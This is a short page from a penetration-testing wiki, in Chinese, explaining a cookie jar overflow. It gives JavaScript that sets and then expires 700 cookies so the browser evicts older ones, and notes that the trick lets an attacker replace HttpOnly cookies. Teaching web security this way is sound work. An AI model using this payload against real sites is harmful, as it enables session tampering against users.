hacktricks/src/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md

{{#include ../../banners/hacktricks-training.md}}

浏览器对每个页面可以存储的cookie数量有限制。因此，如果出于某种原因你需要让一个cookie消失，你可以溢出cookie罐，因为最旧的cookie会被删除。

// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`
}

注意，指向不同域的第三方 cookies 不会被覆盖。

Caution

此攻击也可以用来覆盖 HttpOnly cookies，因为您可以删除它，然后用您想要的值重置它。

在这篇带实验室的文章中检查此内容。

{{#include ../../banners/hacktricks-training.md}}